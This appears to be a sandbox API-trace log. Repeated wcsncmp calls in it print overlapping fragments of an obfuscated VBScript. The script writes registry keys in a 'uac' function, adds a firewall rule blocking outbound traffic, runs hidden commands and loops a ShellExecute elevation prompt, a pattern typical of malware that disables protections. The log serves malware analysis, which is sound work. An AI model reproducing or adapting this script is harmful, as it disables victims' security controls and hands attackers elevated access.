bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.377] wcsncmp (_String1=" = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.377] wcsncmp (_String1="= str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.377] wcsncmp (_String1=" str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.377] wcsncmp (_String1="str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.377] wcsncmp (_String1="tr2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, 